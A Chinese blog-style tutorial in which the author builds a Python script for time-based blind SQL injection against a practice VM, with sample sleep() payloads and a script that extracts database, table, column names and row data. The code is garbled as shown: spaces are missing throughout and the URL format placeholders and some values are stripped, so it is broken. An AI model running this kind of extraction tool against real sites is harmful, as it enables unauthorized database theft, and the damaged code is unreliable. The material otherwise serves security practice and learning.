用Python自定义打造的时间盲注脚本

推荐一个自带很多web的入门练习虚拟机--webug，网上有资源，如果嫌大可以找Johnson。

最近johnson在测试webug上的一个时间盲注的时候，就想着自己写一个脚本。

访问页面是这样的：

提示说传一个type的参数进行

参数变了，页面也会跟着变化，既然是时间注入，就自己手动测试一下。

Payload1:

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='a',sleep(3),1)

页面直接刷新了，最后不断的尝试，发现当payload为：

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='p',sleep(3),1)的时候，页面会暂停3秒，所以数据库的第一个字母是p，为了锻炼自己，手动写了一个简单的，冗余非常大的脚本。

#!/usr/bin/env python

# encoding: utf-8

"""

@version: V1.0

@author: johnson

@file: bool_time.py

@time: 1/2/18 4:24 PM

"""

importrequests

importtime

s =3#设置延时的秒数

#主函数

defmain():

url =raw_input("Please input url:")#输入需要测试的地址

# # url = "http://192.168.1.105/pentest/test/time/?type=1"

payloads ="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,"

print"start get length..."

length = getDatabaseLength(url)#获取数据库的长度

print"start database sql injection..."

database = getDatabaseName(url,length,payloads)#获取数据库的名字

print"the current database is "+ database

print"start get table count..."

table_count = getTableCount(url,database)#获取表的数量

print"the database %s's table count is %d"% (database,table_count)

print"start get table length..."

# table_count = 4

table_length = (getTableLength(url,table_count,database))#获取表的长度

printtable_length

print"start table sql injection..."

tables = getTableName(url,payloads,database,table_length)#获取表名

print"table name is "

printName(tables)

break_while ='Y'

#循环查看表的结构

whilebreak_while =='Y'orbreak_while =='y':

table_name =raw_input("Please input table name:")

columns = getColumnName(url,table_name,database,payloads)#获取指定表的列名

print"column name is "

printName(columns)

break_while =raw_input("Do you want to inject other table name?(Y/n)")

ifbreak_whileisNone:

break_while ='Y'

ifbreak_while =='n'orbreak_while =='N':

get_data =raw_input("Do you want to test other column?(Y/n)")

ifget_data =='Y'orget_data =='y':

column_name =raw_input("Please input column name:")

getDatas(url,payloads,table_name,column_name)#获取指定表指定列的数据

break

else:

break_while ='N'

#获取当前数据库长度

defgetDatabaseLength(url):

foriinrange(1,50):

start_time = time.time()

url1 =" and if(length(database())=, sleep(),1)%23".format(url=url,i=i,s=s)

#print url1

requests.get(url1)

iftime.time() - start_time > s-1:

print"the length is "+str(i)

returni

#获取当前数据库的名字

defgetDatabaseName(url,length,payloads):

database =""

fordinrange(1,length +1):

forpayloadinpayloads:

start_time = time.time()

url2 =" and if(substr(database(), ,1)='', sleep(),1)%23".format(url=url,d=d,payload=payload,s=s)

requests.get(url2)

iftime.time() - start_time > s-1:

database += payload

printdatabase

break

returndatabase

#获取指定数据库的表数量

defgetTableCount(url,database):

table_count =

forcountinrange(1,50):

start_time_of_table_count = time.time()

url_get_count =" and if(substr((select count(*) from information_schema.tables where table_schema=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,count= count)

requests.get(url_get_count)

#print urlGetCount

iftime.time() - start_time_of_table_count > s-1:

table_count = count

break

returntable_count

#获取指定数据库的所有表长度

defgetTableLength(url,table_count,database):

table_length = []

forcountinrange(,table_count):

foriinrange(1,21):

start_time_of_table_length = time.time()

url3 =" and if(substr((select length(table_name) from information_schema.tables where table_schema='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,count= count,i= i,s= s)

#print url3

requests.get(url3)

iftime.time() - start_time_of_table_length > s-1:

table_length.append(i)

print"the table '%d' length is %s"% (count+1,i)

break

returntable_length

#获取表名字

defgetTableName(url,payloads,database,table_length):

tables = []

foriinrange(,len(table_length)):

table =""

fordinrange(1,table_length[i]+1):

forpayloadinpayloads:

start_time_of_table_name = time.time()

url4 =" and if(substr((select table_name from information_schema.tables where table_schema='' limit ,1),'',1) = '', sleep(),1)".format(url= url,i= i,d= d,payload= payload,database= database,s= s)

requests.get(url4)

iftime.time() - start_time_of_table_name > s-1:

table += payload

printtable

break

tables.append(table)

returntables

#输出名字

defprintName(result):

foriinrange(,len(result)):

printresult[i]

#获取指定表的列的数量

defgetColumnCount(url,table_name,database):

column_count =

forcountinrange(1,50):

start_time_of_column_count = time.time()

url_get_column_count =" and if(substr((select count(*) from information_schema.columns where table_schema='' and table_name=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,table_name=table_name,count= count)

requests.get(url_get_column_count)

# print urlGetColumnCount

iftime.time() - start_time_of_column_count > s-1:

column_count = count

break

returncolumn_count

#获取指定表列的长度

defgetColumnLen(url,column_count,database,table_name):

column_length = []

forcountinrange(,column_count):

foriinrange(1,21):

start_time = time.time()

get_url=" and if(substr((select length(column_name) from information_schema.columns where table_schema='' and table_name='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,table_name=table_name,count= count,i= i,s= s)

#print getURL

requests.get(get_url)

iftime.time() - start_time > s-1:

column_length.append(i)

print"the column '%d' length is %s"% (count+1,i)

break

returncolumn_length

#获取列名

defgetColumnName(url,table_name,database,payloads):

column_names = []

column_count = getColumnCount(url,table_name,database)

printcolumn_count

column_len = getColumnLen(url,column_count,database,table_name)

forkinrange(,len(column_len)):

column =""

fordinrange(1,column_len[k]+1):

forpayloadinpayloads:

start_time = time.time()

url4 =" and if(substr((select column_name from information_schema.columns where table_schema='' and table_name='' limit ,1),'',1) = '', sleep(),1)%23".format(

url=url,database=database,table_name=table_name,i=k,d=d,payload=payload,s=s)

requests.get(url4)

iftime.time() - start_time > s -1:

column += payload

printcolumn

break

column_names.append(column)

returncolumn_names

#获取指定列的数据数量

defgetDataCount(url,table_name,column_name):

data_count =

forcountinrange(1,50):

start_time = time.time()

url_get_data_count =" and if(substr((select count(*) from ),1,1) = , sleep(),1)%23".format(

url=url,column_name=column_name,s=s,table_name=table_name,count=count)

requests.get(url_get_data_count)

# print urlGetColumnCount

iftime.time() - start_time > s -1:

data_count = count

break

returndata_count

#获取指定列的数据长度

defgetDataLen(url,table_name,column_name,id):

data_len =

forlinrange(,100000):

start_time_of_get_data_len = time.time()

get_data_len_url =" and if(substr((select length() from limit ,1)=,1,1), sleep(),1)%23".format(s= s,l= l,id= id,table_name= table_name,column_name= column_name,url= url)

requests.get(get_data_len_url)

# print get_data_len_url

iftime.time() - start_time_of_get_data_len > s -1:

print"the data '%d' length is %d"% (id,l)

data_len = l

break

returndata_len

#获取数据

defgetDatas(url,payloads,table_name,column_name):

datas = []

data_count = getDataCount(url,table_name,column_name)

print"the data's count is %d"% (data_count)

foriinrange(,data_count):

data =""

data_len = getDataLen(url,table_name,column_name,i)

print"the data's len is %d"% (data_len)

forjinrange(,data_len +1):

forpayloadinpayloads:

start_time = time.time()

url_of_get_datas =" and if(substr((select from limit ,1),,1)='', sleep(),1)%23".format(url=url,column_name=column_name,table_name=table_name,payload=payload,j=j,s=s,i=i)

requests.get(url_of_get_datas)

iftime.time() - start_time > s -1:

data += payload

printdata

break

datas.append(data)

if__name__ =='__main__':

main()

最后的结果就是：

代码写的比较随意，只是希望多交流学习